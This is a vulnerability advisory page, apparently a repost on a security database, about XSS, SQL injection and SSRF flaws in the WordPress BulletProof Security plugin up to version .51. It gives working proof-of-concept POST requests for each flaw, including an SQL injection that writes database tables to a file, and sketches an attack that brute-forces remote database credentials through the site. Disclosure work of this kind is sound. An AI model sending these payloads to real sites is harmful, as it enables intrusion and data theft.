Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31445
HistoryDec 01, 2014 - 12:00 a.m.

Wordpress bulletproof-security <=.51 multiple vulnerabilities

2014-12-0100:00:00
vulners.com
14
JSON

Vulnerability title: Wordpress bulletproof-security <=.51 multiple
vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749
Vendor: AITpro
Product: bulletproof-security
Affected version: bulletproof-security <= .51
Vulnerabilities fixed in version: .51.1

Details:

xss vulnerability (CVE-2014-7958):

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1

dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

SQL injection vulnerability (CVE-2014-7959, correct db username and
password is required in order to exploit this):

POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1

dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b±-+&username=&Login-Security-Unlock=Unlock+User+Account

SSRF vulnerability (CVE-2014-8749)

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1
dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

Possible scenario:

  • the user sends a request with username, password, host and other
    parameters to the vulnerable page
  • the server doesn't check the host parameter to be in a whitelist of
    permitted databases
  • the server performs an authentication request to a remote or
    internal network database and gives back to the attacker the
    authentication result
    -After n attemps the attacker has bypassed access restrictions (if
    any) to the remote database, discovered the remote database password,
    and made it appear bulletproof-security as the source of the attack.

Extra step:
-If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker
could also execute arbitrary sql statement on the remote server, as
the vulnerable page executes a query if the authentication is
successful (without filtering or use prepared statements). The source
of the attack would appear to be the bulletproof-security vulnerable
site.

Related

wpvulndb 1
zdt 1
packetstorm 1
patchstack 3
prion 3
cve 3
securityvulns 1
wpvulndb
wpvulndb
BulletProof Security <= .51 - Multiple Vulnerabilities (XSS & SSRF)
2014-11-05 00:00:00
zdt
zdt
WordPress Bulletproof-Security .51 Multiple Vulnerabilities
2014-11-06 00:00:00
packetstorm
packetstorm
WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF
2014-11-05 00:00:00
patchstack
patchstack
WordPress BulletProof Security Plugin <= .51 - SQL Injection
2014-10-07 00:00:00
WordPress BulletProof Security Plugin <= .51 - XSS
2014-10-07 00:00:00
WordPress BulletProof Security Plugin <= .51 - SSRF
2014-10-13 00:00:00
prion
prion
Sql injection
2014-11-06 15:55:00
Cross site scripting
2014-11-06 15:55:00
Server side request forgery (ssrf)
2014-12-01 15:59:00
cve
cve
CVE-2014-7959
2014-11-06 15:55:00
CVE-2014-7958
2014-11-06 15:55:00
CVE-2014-8749
2014-12-01 15:59:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-12-01 00:00:00
JSON
Related for SECURITYVULNS:DOC:31445
wpvulndb1zdt1packetstorm1patchstack3prion3cve3securityvulns1